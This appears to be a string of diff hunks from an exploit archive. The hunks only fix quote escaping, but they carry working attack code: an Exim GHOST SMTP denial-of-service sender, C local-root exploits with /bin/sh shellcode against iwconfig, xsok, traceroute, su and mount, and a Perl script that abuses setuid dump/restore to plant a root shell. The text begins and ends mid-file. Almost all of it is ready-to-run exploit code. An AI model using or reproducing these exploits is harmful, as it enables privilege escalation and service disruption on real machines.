buffer = "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
|
||||
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
|
||||
|
||||
target = argv[1] # SET TARGET
|
||||
port = argv[2] # SET PORT
|
||||
|
||||
print \"(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com\"
|
||||
print \"(--==== Sending GHOST SMTP DoS to \" + target + \":\" + port + \" with length:\" +str(len(buffer))
|
||||
print "(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com"
|
||||
print "(--==== Sending GHOST SMTP DoS to " + target + ":" + port + " with length:" +str(len(buffer))
|
||||
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
connect=s.connect((target,int(port)))
|
||||
data = s.recv(1024)
|
||||
print \"CONNECTION: \" +data
|
||||
s.send(\'HELO \' + buffer + \'\\r\\n\')
|
||||
print "CONNECTION: " +data
|
||||
s.send('HELO ' + buffer + '\r\n')
|
||||
data = s.recv(1024)
|
||||
print \"received: \" +data
|
||||
s.send(\'EHLO \' + buffer + \'\\r\\n\')
|
||||
print "received: " +data
|
||||
s.send('EHLO ' + buffer + '\r\n')
|
||||
data = s.recv(1024)
|
||||
print \"received: \" +data
|
||||
print "received: " +data
|
||||
s.close()
|
||||
|
||||
main(sys.argv)
|
||||
|
|
|
@ -7,12 +7,12 @@
|
|||
|
||||
/* 45 Byte /bin/sh >> http://www.milw0rm.com/id.php?id=1169 */
|
||||
char shellcode[]=
|
||||
\"\\x31\\xc0\\x31\\xdb\\x50\\x68\\x2f\\x2f\"
|
||||
\"\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\"
|
||||
\"\\xe3\\x50\\x53\\x89\\xe1\\x31\\xd2\\xb0\"
|
||||
\"\\x0b\\x51\\x52\\x55\\x89\\xe5\\x0f\\x34\"
|
||||
\"\\x31\\xc0\\x31\\xdb\\xfe\\xc0\\x51\\x52\"
|
||||
\"\\x55\\x89\\xe5\\x0f\\x34\";
|
||||
"\x31\xc0\x31\xdb\x50\x68\x2f\x2f"
|
||||
"\x73\x68\x68\x2f\x62\x69\x6e\x89"
|
||||
"\xe3\x50\x53\x89\xe1\x31\xd2\xb0"
|
||||
"\x0b\x51\x52\x55\x89\xe5\x0f\x34"
|
||||
"\x31\xc0\x31\xdb\xfe\xc0\x51\x52"
|
||||
"\x55\x89\xe5\x0f\x34";
|
||||
|
||||
int main(int argc,char **argv){
|
||||
char buf[96];
|
||||
|
@ -20,30 +20,30 @@ int main(int argc,char **argv){
|
|||
unsigned long ret;
|
||||
int i, offset;
|
||||
unsigned long sp(void)
|
||||
{ __asm__(\"movl %esp, %eax\");}
|
||||
{ __asm__("movl %esp, %eax");}
|
||||
char *prog[]={argv[1],buf,NULL};
|
||||
char *env[]={\"3v1lsh3ll0=\",shellcode,NULL};
|
||||
char *env[]={"3v1lsh3ll0=",shellcode,NULL};
|
||||
|
||||
if (argc >= 2) {
|
||||
printf(\"\\n*********************************************\\n\");
|
||||
printf(\" iwconfig Version 26 Localroot Exploit \\n\");
|
||||
printf(\" Coded by Qnix[at]bsdmail[dot]org \\n\");
|
||||
printf(\"*********************************************\\n\\n\");
|
||||
printf("\n*********************************************\n");
|
||||
printf(" iwconfig Version 26 Localroot Exploit \n");
|
||||
printf(" Coded by Qnix[at]bsdmail[dot]org \n");
|
||||
printf("*********************************************\n\n");
|
||||
} else {
|
||||
printf(\"\\n*********************************************\\n\");
|
||||
printf(\" iwconfig Version 26 Localroot Exploit \\n\");
|
||||
printf(\" Coded by Qnix[at]bsdmail[dot]org \\n\");
|
||||
printf(\"*********************************************\\n\\n\");
|
||||
printf(\"\\n USEAGE: ./iwconfig-exploit <iwconfig FULLPATH e.g /sbin/iwconfig or /usr/sbin/iwconfig>\\n\\n\");
|
||||
printf("\n*********************************************\n");
|
||||
printf(" iwconfig Version 26 Localroot Exploit \n");
|
||||
printf(" Coded by Qnix[at]bsdmail[dot]org \n");
|
||||
printf("*********************************************\n\n");
|
||||
printf("\n USEAGE: ./iwconfig-exploit <iwconfig FULLPATH e.g /sbin/iwconfig or /usr/sbin/iwconfig>\n\n");
|
||||
return 1;
|
||||
}
|
||||
|
||||
offset = 0;
|
||||
esp = sp();
|
||||
ret=0xc0000000-strlen(shellcode)-strlen(prog[0])-0x06;
|
||||
printf(\"[~] S-p.ESP : 0x%x\\n\", esp);
|
||||
printf(\"[~] O-F.ESP : 0x%x\\n\", offset);
|
||||
printf(\"[~] Return Addr : 0x%x\\n\\n\", ret);
|
||||
printf("[~] S-p.ESP : 0x%x\n", esp);
|
||||
printf("[~] O-F.ESP : 0x%x\n", offset);
|
||||
printf("[~] Return Addr : 0x%x\n\n", ret);
|
||||
|
||||
memset(buf,0x41,sizeof(buf));
|
||||
memcpy(&buf[92],&ret,4);
|
||||
|
|
|
@ -11,7 +11,7 @@
|
|||
#include <stdio.h>
|
||||
#include <unistd.h>
|
||||
|
||||
#define BIN \"/usr/games/xsok\"
|
||||
#define BIN "/usr/games/xsok"
|
||||
#define RETADD 0xbffffa3c
|
||||
#define SIZE 200
|
||||
|
||||
|
@ -19,12 +19,12 @@
|
|||
unsigned char shellcode[] =
|
||||
|
||||
/* setregid (20,20) shellcode */
|
||||
\"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\xb3\\x14\\xb1\\x14\\xb0\\x47\"
|
||||
\"\\xcd\\x80\"
|
||||
"\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0\x47"
|
||||
"\xcd\x80"
|
||||
|
||||
/* exec /bin/sh shellcode */
|
||||
\"\\x31\\xd2\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\"
|
||||
\"\\x69\\x89\\xe3\\x52\\x53\\x89\\xe1\\x8d\\x42\\x0b\\xcd\\x80\";
|
||||
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
|
||||
"\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
|
||||
|
||||
|
||||
|
||||
|
@ -33,8 +33,8 @@ int main (int argc, char ** argv)
|
|||
int i, ret = RETADD;
|
||||
char out[SIZE];
|
||||
|
||||
fprintf(stdout, \"\\n --- 0x333xsok => xsok 1.02 local games exploit ---\\n\");
|
||||
fprintf(stdout, \" --- Outsiders Se(c)urity Labs 2003 ---\\n\\n\");
|
||||
fprintf(stdout, "\n --- 0x333xsok => xsok 1.02 local games exploit ---\n");
|
||||
fprintf(stdout, " --- Outsiders Se(c)urity Labs 2003 ---\n\n");
|
||||
|
||||
int *xsok = (int *)(out);
|
||||
|
||||
|
@ -43,7 +43,7 @@ int main (int argc, char ** argv)
|
|||
memset((char *)out, 0x90, 63);
|
||||
memcpy((char *)out+63, shellcode, strlen(shellcode));
|
||||
|
||||
execl (BIN, BIN, \"-xsokdir\", out, 0x0);
|
||||
execl (BIN, BIN, "-xsokdir", out, 0x0);
|
||||
}
|
||||
|
||||
// milw0rm.com [2004-01-02]
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
* MasterSecuritY <www.mastersecurity.fr>
|
||||
*
|
||||
* openwall.c - Local root exploit in LBNL traceroute
|
||||
* Copyright (C) 2000 Michel \"MaXX\" Kaempf <maxx@mastersecurity.fr>
|
||||
* Copyright (C) 2000 Michel "MaXX" Kaempf <maxx@mastersecurity.fr>
|
||||
*
|
||||
* Updated versions of this exploit and the corresponding advisory will
|
||||
* be made available at:
|
||||
|
@ -32,32 +32,32 @@
|
|||
#define PREV_INUSE 0x1
|
||||
#define IS_MMAPPED 0x2
|
||||
|
||||
char * filename = \"/usr/sbin/traceroute\";
|
||||
char * filename = "/usr/sbin/traceroute";
|
||||
unsigned int stack = 0xc0000000 - 4;
|
||||
unsigned int p = 0x0804ce38;
|
||||
unsigned int victim = 0x0804c88c;
|
||||
|
||||
char * jmp = \"\\xeb\\x0aXXYYYYZZZZ\";
|
||||
char * jmp = "\xeb\x0aXXYYYYZZZZ";
|
||||
|
||||
char * shellcode =
|
||||
/* <shellcode>: xor %edx,%edx */
|
||||
\"\\x31\\xd2\"
|
||||
"\x31\xd2"
|
||||
/* <shellcode+2>: mov %edx,%eax */
|
||||
\"\\x89\\xd0\"
|
||||
"\x89\xd0"
|
||||
/* <shellcode+4>: mov $0xb,%al */
|
||||
\"\\xb0\\x0b\"
|
||||
"\xb0\x0b"
|
||||
/* <shellcode+6>: mov $XXXX,%ebx */
|
||||
\"\\xbbXXXX\"
|
||||
"\xbbXXXX"
|
||||
/* <shellcode+11>: mov $XXXX,%ecx */
|
||||
\"\\xb9XXXX\"
|
||||
"\xb9XXXX"
|
||||
/* <shellcode+16>: mov %ebx,(%ecx) */
|
||||
\"\\x89\\x19\"
|
||||
"\x89\x19"
|
||||
/* <shellcode+18>: mov %edx,0x4(%ecx) */
|
||||
\"\\x89\\x51\\x04\"
|
||||
"\x89\x51\x04"
|
||||
/* <shellcode+21>: int $0x80 */
|
||||
\"\\xcd\\x80\";
|
||||
"\xcd\x80";
|
||||
|
||||
char * program = \"/bin/sh\";
|
||||
char * program = "/bin/sh";
|
||||
|
||||
int zero( unsigned int ui )
|
||||
{
|
||||
|
@ -71,29 +71,29 @@ int main()
|
|||
{
|
||||
char gateway[ 1337 ];
|
||||
char host[ 1337 ];
|
||||
char * argv[] = { filename, \"-g\", \"123\", \"-g\", gateway, host, NULL };
|
||||
char * argv[] = { filename, "-g", "123", "-g", gateway, host, NULL };
|
||||
unsigned int next;
|
||||
int i;
|
||||
unsigned int hellcode;
|
||||
unsigned int size;
|
||||
|
||||
strcpy( host, \"AAAABBBBCCCCDDDDEEEE\" );
|
||||
next = stack - (strlen(filename) + 1) - (strlen(host) + 1) + strlen(\"AAAA\");
|
||||
strcpy( host, "AAAABBBBCCCCDDDDEEEE" );
|
||||
next = stack - (strlen(filename) + 1) - (strlen(host) + 1) + strlen("AAAA");
|
||||
for ( i = 0; i < next - (next & ~3); i++ ) {
|
||||
strcat( host, \"X\" );
|
||||
strcat( host, "X" );
|
||||
}
|
||||
next = next & ~3;
|
||||
|
||||
((unsigned int *)host)[1] = 0xffffffff & ~PREV_INUSE;
|
||||
((unsigned int *)host)[2] = 0xffffffff;
|
||||
if ( zero( victim - 12 ) ) {
|
||||
fprintf( stderr, \"Null byte(s) in `victim - 12\' (0x%08x)!\\n\", victim - 12 );
|
||||
fprintf( stderr, "Null byte(s) in `victim - 12' (0x%08x)!\n", victim - 12 );
|
||||
return( -1 );
|
||||
}
|
||||
((unsigned int *)host)[3] = victim - 12;
|
||||
hellcode = p + (strlen(\"123\") + 1) + strlen(\"0x42.0x42.0x42.0x42\") + strlen(\" \");
|
||||
hellcode = p + (strlen("123") + 1) + strlen("0x42.0x42.0x42.0x42") + strlen(" ");
|
||||
if ( zero( hellcode ) ) {
|
||||
fprintf( stderr, \"Null byte(s) in `host\' (0x%08x)!\\n\", hellcode );
|
||||
fprintf( stderr, "Null byte(s) in `host' (0x%08x)!\n", hellcode );
|
||||
return( -1 );
|
||||
}
|
||||
((unsigned int *)host)[4] = hellcode;
|
||||
|
@ -102,31 +102,31 @@ int main()
|
|||
size = size | PREV_INUSE;
|
||||
sprintf(
|
||||
gateway,
|
||||
\"0x%02x.0x%02x.0x%02x.0x%02x\",
|
||||
"0x%02x.0x%02x.0x%02x.0x%02x",
|
||||
((unsigned char *)(&size))[0],
|
||||
((unsigned char *)(&size))[1],
|
||||
((unsigned char *)(&size))[2],
|
||||
((unsigned char *)(&size))[3]
|
||||
);
|
||||
|
||||
strcat( gateway, \" \" );
|
||||
strcat( gateway, " " );
|
||||
strcat( gateway, jmp );
|
||||
strcat( gateway, shellcode );
|
||||
strcat( gateway, program );
|
||||
|
||||
hellcode += strlen(jmp) + strlen(shellcode);
|
||||
if ( zero( hellcode ) ) {
|
||||
fprintf( stderr, \"Null byte(s) in `gateway\' (0x%08x)!\\n\", hellcode );
|
||||
fprintf( stderr, "Null byte(s) in `gateway' (0x%08x)!\n", hellcode );
|
||||
return( -1 );
|
||||
}
|
||||
*((unsigned int *)(gateway + strlen(\"0x42.0x42.0x42.0x42\") + strlen(\" \") + strlen(jmp) + 7)) = hellcode;
|
||||
*((unsigned int *)(gateway + strlen("0x42.0x42.0x42.0x42") + strlen(" ") + strlen(jmp) + 7)) = hellcode;
|
||||
|
||||
hellcode += strlen(program) + 1;
|
||||
if ( zero( hellcode ) ) {
|
||||
fprintf( stderr, \"Null byte(s) in `gateway\' (0x%08x)!\\n\", hellcode );
|
||||
fprintf( stderr, "Null byte(s) in `gateway' (0x%08x)!\n", hellcode );
|
||||
return( -1 );
|
||||
}
|
||||
*((unsigned int *)(gateway + strlen(\"0x42.0x42.0x42.0x42\") + strlen(\" \") + strlen(jmp) + 12)) = hellcode;
|
||||
*((unsigned int *)(gateway + strlen("0x42.0x42.0x42.0x42") + strlen(" ") + strlen(jmp) + 12)) = hellcode;
|
||||
|
||||
execve( argv[0], argv, NULL );
|
||||
return( -1 );
|
||||
|
|
|
@ -5,134 +5,134 @@
|
|||
# written by tlabs
|
||||
# Use at your discretion
|
||||
|
||||
$EXPORT1=\"TAPE=garbage:garbage\" ;
|
||||
$EXPORT2=\"RSH=./hey\" ;
|
||||
$EXPORT1="TAPE=garbage:garbage" ;
|
||||
$EXPORT2="RSH=./hey" ;
|
||||
|
||||
sub USAGE
|
||||
{
|
||||
print \"$0 <type>\\n1=dump 2=dump.static 3=restore 4=restore.staic\\nYour choice innit;)\\nWritten by Tlabs\\n\" ;
|
||||
print "$0 <type>\n1=dump 2=dump.static 3=restore 4=restore.staic\nYour choice innit;)\nWritten by Tlabs\n" ;
|
||||
exit 0 ;
|
||||
}
|
||||
|
||||
sub ERROR
|
||||
{
|
||||
print \"$_[0]\\n\" ;
|
||||
print "$_[0]\n" ;
|
||||
exit 0 ;
|
||||
}
|
||||
|
||||
open(TEMP, \">shell.c\")|| ERROR(\"Something went wrong:$!\");
|
||||
printf TEMP \"#include<unistd.h>\\n#include<stdlib.h>\\nint main()\\n{\" ;
|
||||
printf TEMP \" setuid(0);\\n\\tsetgid(0);\\n\\texecl(\\\"/bin/sh\\\",\\\"sh\\\",0);\\n\\treturn 0;\\n}\" ;
|
||||
open(TEMP, ">shell.c")|| ERROR("Something went wrong:$!");
|
||||
printf TEMP "#include<unistd.h>\n#include<stdlib.h>\nint main()\n{" ;
|
||||
printf TEMP " setuid(0);\n\tsetgid(0);\n\texecl(\"/bin/sh\",\"sh\",0);\n\treturn 0;\n}" ;
|
||||
close(TEMP);
|
||||
system \"cc -o shell shell.c\" ;
|
||||
unlink \"shell.c\" ;
|
||||
open(TEMP1, \">hey\")|| ERROR(\"Something went wrong: $!\");
|
||||
printf TEMP1 \"#!/bin/sh\\nchown root shell\\nchmod 4755 shell\" ;
|
||||
system "cc -o shell shell.c" ;
|
||||
unlink "shell.c" ;
|
||||
open(TEMP1, ">hey")|| ERROR("Something went wrong: $!");
|
||||
printf TEMP1 "#!/bin/sh\nchown root shell\nchmod 4755 shell" ;
|
||||
close(TEMP1);
|
||||
chmod(0755, \"hey\");
|
||||
chmod(0755, "hey");
|
||||
|
||||
if ($ARGV[$0] eq \"1\")
|
||||
if ($ARGV[$0] eq "1")
|
||||
{
|
||||
$DUMPER=\"/sbin/dump\" ;
|
||||
if ( -u \"$DUMPER\" )
|
||||
$DUMPER="/sbin/dump" ;
|
||||
if ( -u "$DUMPER" )
|
||||
{
|
||||
system \"export $EXPORT1 ;export $EXPORT2 ; $DUMPER -0 \\/\" ;
|
||||
system "export $EXPORT1 ;export $EXPORT2 ; $DUMPER -0 \/" ;
|
||||
sleep(3);
|
||||
if ( -u \"shell\" )
|
||||
if ( -u "shell" )
|
||||
{
|
||||
unlink \"hey\" ;
|
||||
system \"./shell\" ;
|
||||
unlink "hey" ;
|
||||
system "./shell" ;
|
||||
}
|
||||
else
|
||||
{
|
||||
unlink \"hey\" ;
|
||||
unlink \"shell\" ;
|
||||
print \"Something fucked at the last, sorry\" ;
|
||||
unlink "hey" ;
|
||||
unlink "shell" ;
|
||||
print "Something fucked at the last, sorry" ;
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
unlink \"hey\" ;
|
||||
unlink \"shell\" ;
|
||||
printf \"Dump is not exploitable on this system\\n\";
|
||||
unlink "hey" ;
|
||||
unlink "shell" ;
|
||||
printf "Dump is not exploitable on this system\n";
|
||||
}
|
||||
}
|
||||
elsif ($ARGV[$0] eq \"2\")
|
||||
elsif ($ARGV[$0] eq "2")
|
||||
{
|
||||
$DUMPER=\"/sbin/dump.static\" ;
|
||||
if ( -u \"$DUMPER\" )
|
||||
$DUMPER="/sbin/dump.static" ;
|
||||
if ( -u "$DUMPER" )
|
||||
{
|
||||
system \"export $EXPORT1 ;export $EXPORT2 ; $DUMPER -0 \\/\" ;
|
||||
system "export $EXPORT1 ;export $EXPORT2 ; $DUMPER -0 \/" ;
|
||||
sleep(3);
|
||||
if ( -u \"shell\" )
|
||||
if ( -u "shell" )
|
||||
{
|
||||
unlink \"hey\" ;
|
||||
system \"./shell\" ;
|
||||
unlink "hey" ;
|
||||
system "./shell" ;
|
||||
}
|
||||
else
|
||||
{
|
||||
unlink \"hey\" ;
|
||||
unlink \"shell\" ;
|
||||
print \"Something fucked at the last, sorry\" ;
|
||||
unlink "hey" ;
|
||||
unlink "shell" ;
|
||||
print "Something fucked at the last, sorry" ;
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
unlink \"hey\" ;
|
||||
unlink \"shell\" ;
|
||||
printf \"Dump.static is not exploitable on this system\\n\";
|
||||
unlink "hey" ;
|
||||
unlink "shell" ;
|
||||
printf "Dump.static is not exploitable on this system\n";
|
||||
}
|
||||
}
|
||||
elsif ($ARGV[$0] eq \"3\")
|
||||
elsif ($ARGV[$0] eq "3")
|
||||
{
|
||||
$RESTORER=\"/sbin/restore\" ;
|
||||
if ( -u \"$RESTORER\" )
|
||||
$RESTORER="/sbin/restore" ;
|
||||
if ( -u "$RESTORER" )
|
||||
{
|
||||
system \"export $EXPORT1 ; export $EXPORT2 ; $RESTORER -i\" ;
|
||||
system "export $EXPORT1 ; export $EXPORT2 ; $RESTORER -i" ;
|
||||
sleep(3);
|
||||
if ( -u \"shell\" )
|
||||
if ( -u "shell" )
|
||||
{
|
||||
unlink \"hey\" ;
|
||||
system \"./shell\" ;
|
||||
unlink "hey" ;
|
||||
system "./shell" ;
|
||||
}
|
||||
else
|
||||
{
|
||||
unlink \"hey\" ;
|
||||
unlink \"shell\" ;
|
||||
print \"Something fucked at the last, sorry\" ;
|
||||
unlink "hey" ;
|
||||
unlink "shell" ;
|
||||
print "Something fucked at the last, sorry" ;
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
unlink \"hey\" ;
|
||||
unlink \"shell\" ;
|
||||
printf \"Restore is not exploitable on this system\\n\";
|
||||
unlink "hey" ;
|
||||
unlink "shell" ;
|
||||
printf "Restore is not exploitable on this system\n";
|
||||
}
|
||||
}
|
||||
elsif ($ARGV[$0] eq \"4\")
|
||||
elsif ($ARGV[$0] eq "4")
|
||||
{
|
||||
$RESTORER=\"/sbin/restore.static\" ;
|
||||
if ( -u \"$RESTORER\" )
|
||||
$RESTORER="/sbin/restore.static" ;
|
||||
if ( -u "$RESTORER" )
|
||||
{
|
||||
system \"export $EXPORT1 ; export $EXPORT2 ; $RESTORER -i\" ;
|
||||
system "export $EXPORT1 ; export $EXPORT2 ; $RESTORER -i" ;
|
||||
sleep(3);
|
||||
if ( -u \"shell\" )
|
||||
if ( -u "shell" )
|
||||
{
|
||||
unlink \"hey\" ;
|
||||
system \"./shell\" ;
|
||||
unlink "hey" ;
|
||||
system "./shell" ;
|
||||
}
|
||||
else
|
||||
{
|
||||
unlink \"hey\" ;
|
||||
unlink \"shell\" ;
|
||||
print \"Something fucked at the last, sorry\" ;
|
||||
unlink "hey" ;
|
||||
unlink "shell" ;
|
||||
print "Something fucked at the last, sorry" ;
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
unlink \"hey\" ;
|
||||
unlink \"shell\" ;
|
||||
printf \"Restore.static is not exploitable on this system\\n\";
|
||||
unlink "hey" ;
|
||||
unlink "shell" ;
|
||||
printf "Restore.static is not exploitable on this system\n";
|
||||
}
|
||||
}
|
||||
else
|
||||
|
|
|
@ -43,16 +43,16 @@ It should be noted under Linux this problem must be exploited in conjunction wit
|
|||
#define DEFAULT_BUFFER_SIZE 2048
|
||||
#define DEFAULT_EGG_SIZE 1024
|
||||
#define NOP 0x90
|
||||
#define PATH \\\"/tmp/LC_MESSAGES\\\"
|
||||
#define PATH "/tmp/LC_MESSAGES"
|
||||
|
||||
char shellcode[] =
|
||||
\\\"\\\\xeb\\\\x1f\\\\x5e\\\\x89\\\\x76\\\\x08\\\\x31\\\\xc0\\\\x88\\\\x46\\\\x07\\\\x89\\\\x46\\\\x0c\\\\xb0\\\\x0b\\\"
|
||||
\\\"\\\\x89\\\\xf3\\\\x8d\\\\x4e\\\\x08\\\\x8d\\\\x56\\\\x0c\\\\xcd\\\\x80\\\\x31\\\\xdb\\\\x89\\\\xd8\\\\x40\\\\xcd\\\"
|
||||
\\\"\\\\x80\\\\xe8\\\\xdc\\\\xff\\\\xff\\\\xff/bin/sh\\\";
|
||||
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
|
||||
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
|
||||
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
|
||||
|
||||
|
||||
unsigned long get_esp(void) {
|
||||
__asm__(\\\"movl %esp,%eax\\\");
|
||||
__asm__("movl %esp,%eax");
|
||||
}
|
||||
|
||||
|
||||
|
@ -65,7 +65,7 @@ unsigned long get_esp(void) {
|
|||
int i,reth,retl,num=113;
|
||||
FILE *fp;
|
||||
|
||||
if (argc > 1) sscanf(argv[1],\\\"%x\\\",&retloc);
|
||||
if (argc > 1) sscanf(argv[1],"%x",&retloc);
|
||||
if (argc > 2) offset = atoi(argv[2]);
|
||||
if (argc > 3) num = atoi(argv[3]);
|
||||
if (argc > 4) align = atoi(argv[4]);
|
||||
|
@ -74,27 +74,27 @@ unsigned long get_esp(void) {
|
|||
|
||||
|
||||
|
||||
printf(\\\"Usages: %s <RETloc> <offset> <num> <align> <buffsize> <eggsize> \\\\n\\\",argv[0]);
|
||||
printf("Usages: %s <RETloc> <offset> <num> <align> <buffsize> <eggsize> \n",argv[0]);
|
||||
|
||||
if (!(buff = malloc(eggsize))) {
|
||||
printf(\\\"Can\\\'t allocate memory.\\\\n\\\");
|
||||
printf("Can't allocate memory.\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
||||
if (!(buff1 = malloc(bsize))) {
|
||||
printf(\\\"Can\\\'t allocate memory.\\\\n\\\");
|
||||
printf("Can't allocate memory.\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
if (!(egg = malloc(eggsize))) {
|
||||
printf(\\\"Can\\\'t allocate memory.\\\\n\\\");
|
||||
printf("Can't allocate memory.\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
printf(\\\"Using RET location address: 0x%x\\\\n\\\", retloc);
|
||||
printf("Using RET location address: 0x%x\n", retloc);
|
||||
shell_addr = get_esp() + offset;
|
||||
printf(\\\"Using Shellcode address: 0x%x\\\\n\\\", shell_addr);
|
||||
printf("Using Shellcode address: 0x%x\n", shell_addr);
|
||||
|
||||
reth = (shell_addr >> 16) & 0xffff ;
|
||||
retl = (shell_addr >> 0) & 0xffff ;
|
||||
|
@ -102,7 +102,7 @@ unsigned long get_esp(void) {
|
|||
ptr = buff;
|
||||
|
||||
for (i = 0; i <2 ; i++, retloc+=2 ){
|
||||
memset(ptr,\\\'A\\\',4);
|
||||
memset(ptr,'A',4);
|
||||
ptr += 4 ;
|
||||
(*ptr++) = retloc & 0xff;
|
||||
(*ptr++) = (retloc >> 8 ) & 0xff ;
|
||||
|
@ -110,27 +110,27 @@ unsigned long get_esp(void) {
|
|||
(*ptr++) = (retloc >> 24 ) & 0xff ;
|
||||
}
|
||||
|
||||
memset(ptr,\\\'A\\\',align);
|
||||
memset(ptr,'A',align);
|
||||
|
||||
ptr = buff1;
|
||||
|
||||
for(i = 0 ; i < num ; i++ )
|
||||
{
|
||||
memcpy(ptr, \\\"%.8x\\\", 4);
|
||||
memcpy(ptr, "%.8x", 4);
|
||||
ptr += 4;
|
||||
}
|
||||
|
||||
sprintf(ptr, \\\"%%%uc%%hn%%%uc%%hn\\\",(retl - num*8),
|
||||
sprintf(ptr, "%%%uc%%hn%%%uc%%hn",(retl - num*8),
|
||||
(0x10000 + reth - retl));
|
||||
|
||||
|
||||
mkdir(PATH,0755);
|
||||
chdir(PATH);
|
||||
fp = fopen(\\\"libc.po\\\", \\\"w+\\\");
|
||||
fprintf(fp,\\\"msgid \\\\\\\"%%s: invalid option -- %%c\\\\\\\\n\\\\\\\"\\\\n\\\");
|
||||
fprintf(fp,\\\"msgstr \\\\\\\"%s\\\\\\\\n\\\\\\\"\\\", buff1);
|
||||
fp = fopen("libc.po", "w+");
|
||||
fprintf(fp,"msgid \"%%s: invalid option -- %%c\\n\"\n");
|
||||
fprintf(fp,"msgstr \"%s\\n\"", buff1);
|
||||
fclose(fp);
|
||||
system(\\\"/usr/bin/msgfmt libc.po -o libc.mo\\\");
|
||||
system("/usr/bin/msgfmt libc.po -o libc.mo");
|
||||
|
||||
|
||||
ptr = egg;
|
||||
|
@ -140,13 +140,13 @@ unsigned long get_esp(void) {
|
|||
for (i = 0; i < strlen(shellcode); i++)
|
||||
*(ptr++) = shellcode[i];
|
||||
|
||||
egg[eggsize - 1] = \\\'\\\\0\\\';
|
||||
egg[eggsize - 1] = '\0';
|
||||
|
||||
memcpy(egg, \\\"EGG=\\\", 4);
|
||||
memcpy(egg, "EGG=", 4);
|
||||
env[0] = egg ;
|
||||
env[1] = \\\"LANGUAGE=sk_SK/../../../../../../tmp\\\";
|
||||
env[1] = "LANGUAGE=sk_SK/../../../../../../tmp";
|
||||
env[2] = (char *)0 ;
|
||||
|
||||
execle(\\\"/bin/su\\\",\\\"su\\\",\\\"-u\\\", buff, NULL,env);
|
||||
execle("/bin/su","su","-u", buff, NULL,env);
|
||||
|
||||
} /* end of main */
|
|
@ -6,7 +6,7 @@
|
|||
* Redhat 6.2 (mount-2.10f) : ./mnt -n 114 -a 0x080565dc -i 112
|
||||
* compiled on rh 6.2 (mount-2.10m): ./mnt -n 114 -a 0x08059218 -i 112
|
||||
*
|
||||
* \\\"objdump /bin/mount | grep exit\\\" to get the -a address
|
||||
* "objdump /bin/mount | grep exit" to get the -a address
|
||||
*
|
||||
* - sk8
|
||||
*/
|
||||
|
@ -17,32 +17,32 @@
|
|||
|
||||
char sc[]=
|
||||
/* main: */ /* setreuid(0, 0); */
|
||||
\\\"\\\\x29\\\\xc0\\\" /* subl %eax, %eax */
|
||||
\\\"\\\\xb0\\\\x46\\\" /* movb $70, %al */
|
||||
\\\"\\\\x29\\\\xdb\\\" /* subl %ebx, %ebx */
|
||||
\\\"\\\\xb3\\\\x0c\\\" /* movb $12, %bl */
|
||||
\\\"\\\\x80\\\\xeb\\\\x0c\\\" /* subb $12, %bl */
|
||||
\\\"\\\\x89\\\\xd9\\\" /* movl %ebx, %ecx */
|
||||
\\\"\\\\xcd\\\\x80\\\" /* int $0x80 */
|
||||
\\\"\\\\xeb\\\\x18\\\" /* jmp callz */
|
||||
"\x29\xc0" /* subl %eax, %eax */
|
||||
"\xb0\x46" /* movb $70, %al */
|
||||
"\x29\xdb" /* subl %ebx, %ebx */
|
||||
"\xb3\x0c" /* movb $12, %bl */
|
||||
"\x80\xeb\x0c" /* subb $12, %bl */
|
||||
"\x89\xd9" /* movl %ebx, %ecx */
|
||||
"\xcd\x80" /* int $0x80 */
|
||||
"\xeb\x18" /* jmp callz */
|
||||
|
||||
/* start: */ /* execve of /bin/sh */
|
||||
\\\"\\\\x5e\\\" /* popl %esi */
|
||||
\\\"\\\\x29\\\\xc0\\\" /* subl %eax, %eax */
|
||||
\\\"\\\\x88\\\\x46\\\\x07\\\" /* movb %al, 0x07(%esi) */
|
||||
\\\"\\\\x89\\\\x46\\\\x0c\\\" /* movl %eax, 0x0c(%esi) */
|
||||
\\\"\\\\x89\\\\x76\\\\x08\\\" /* movl %esi, 0x08(%esi) */
|
||||
\\\"\\\\xb0\\\\x0b\\\" /* movb $0x0b, %al */
|
||||
\\\"\\\\x87\\\\xf3\\\" /* xchgl %esi, %ebx */
|
||||
\\\"\\\\x8d\\\\x4b\\\\x08\\\" /* leal 0x08(%ebx), %ecx */
|
||||
\\\"\\\\x8d\\\\x53\\\\x0c\\\" /* leal 0x0c(%ebx), %edx */
|
||||
\\\"\\\\xcd\\\\x80\\\" /* int $0x80 */
|
||||
"\x5e" /* popl %esi */
|
||||
